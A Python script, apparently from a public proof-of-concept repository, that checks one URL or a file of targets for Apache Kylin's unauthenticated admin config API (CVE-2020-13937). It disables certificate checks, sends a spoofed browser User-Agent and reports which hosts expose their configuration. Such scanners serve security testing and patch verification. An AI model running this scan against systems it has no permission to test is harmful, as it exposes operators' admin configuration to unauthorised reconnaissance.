cve-2020-13937.py

import requests
import click
import sys

requests.packages.urllib3.disable_warnings()

headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
    }

def info():
    print("[+]============================================================")
    print("[+] Apache Kylin API未授权访问漏洞（CVE-2020-13937）")
    print("[+] Explain: YaunSky")
    print("[+] https://github.com/yaunsky")
    print("[+]============================================================")
    print("                                                               ")

def scan(url):
    target = url + "/kylin/api/admin/config"
    try:
        rep = requests.get(url = target, headers = headers, timeout = 10, verify = False)
        if "config" in rep.text:
            print("[+++++] 目标： {} 存在漏洞".format(target))
        else:
            print("[-----] 目标 {} 不存在漏洞".format(target))
    except:
        print("[-----] 目标 {} 访问失败".format(target))

def scan_txt(file):
    f = open(file, 'r')
    for target in f.readlines():
        target = target.strip() + "/kylin/api/admin/config"
        try:
            rep = requests.get(url = target, headers = headers, timeout = 10, verify = False)
            if "config" in rep.text:
                print("[+++++] 目标： {} 存在漏洞".format(target))
            else:
                print("[-----] 目标 {} 不存在漏洞".format(target))
        except:
            print("[-----] 目标 {} 访问失败".format(target))


@click.command()
@click.option("-u", "--url", help='Target URL; Example:http://ip:port。')
@click.option("-f", "--file", help="Target File; Example:target.txt。")
def main(url,file):
    info()
    if url != None:
        scan(url)
    elif file != None:
        scan_txt(file)
    else:
        print("python3 cve-2020-13937 --help")

if __name__ == "__main__":
    main()